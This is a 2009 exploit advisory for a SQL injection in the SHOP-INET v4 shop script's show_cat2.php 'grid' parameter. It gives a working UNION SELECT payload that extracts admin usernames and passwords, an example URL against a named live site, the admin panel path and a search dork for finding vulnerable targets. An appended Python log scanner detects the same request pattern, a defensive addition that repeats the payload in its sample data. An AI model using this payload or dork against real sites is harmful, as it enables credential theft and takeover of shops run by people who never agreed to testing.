
# Title : SHOP-INET v4 (show_cat2.php grid) SQL Injection Vulnerability
# Published : 2009-01-26
# Author : FeDeReR


# SHOP-INET V.4 Exploit
# Author: FeDeReR
# Home : Hacking.ge & darkc0de.com
# Email : FeDeReR@avoe.ge

#############################################

Exploit : target.com/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,password)+from+admin

Example :http://shop-inet.ru/shop/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,password)+from+admin

Admin CP: target/admin/

d0rk: inurl:show_cat2.php?grid=

official site: http://shop-inet.ru/

############################################
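
A defender's check for the request pattern shown above, as an added example that is not part of the original advisory: it scans web access logs for show_cat2.php requests whose grid value is not a plain integer. It assumes common/combined log format and that grid is meant to be a numeric category id; the log lines and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request portion of a common/combined-format access log line (assumed format).
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# SQL keywords seen in the advisory's request; used only to grade a finding.
SQL_HINT_RE = re.compile(r'\b(union|select|concat(_ws)?|from)\b', re.I)
INTEGER_RE = re.compile(r'[0-9]+')

def check_line(line):
    """Return a finding dict for a suspicious show_cat2.php request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.lower().endswith("/show_cat2.php"):
        return None
    # parse_qs decodes %xx and '+', so encoded variants are normalised first.
    values = parse_qs(url.query, keep_blank_values=True).get("grid", [])
    # Assumption: a legitimate grid value is a non-negative integer id.
    bad = [v for v in values if not INTEGER_RE.fullmatch(v)]
    if not bad:
        return None
    return {
        "ip": m.group("ip"),
        "status": int(m.group("status")),
        "grid": bad[0],
        "sql_keywords": bool(SQL_HINT_RE.search(bad[0])),
    }

def scan(lines):
    """Check every log line and return the list of findings."""
    return [f for f in map(check_line, lines) if f is not None]

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Jan/2009:10:00:01 +0000] '
    '"GET /shop/show_cat2.php?grid=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [26/Jan/2009:10:00:07 +0000] "GET /shop/show_cat2.php?grid='
    '-1+union+select+concat_ws(char(58),username,password)+from+admin HTTP/1.1" 200 812',
    '198.51.100.4 - - [26/Jan/2009:10:00:09 +0000] '
    '"GET /shop/index.php?grid=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 status on a flagged request with sql_keywords set is the case to triage first, since the server answered the query instead of rejecting it.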

# www.Syue.com [2009-01-26]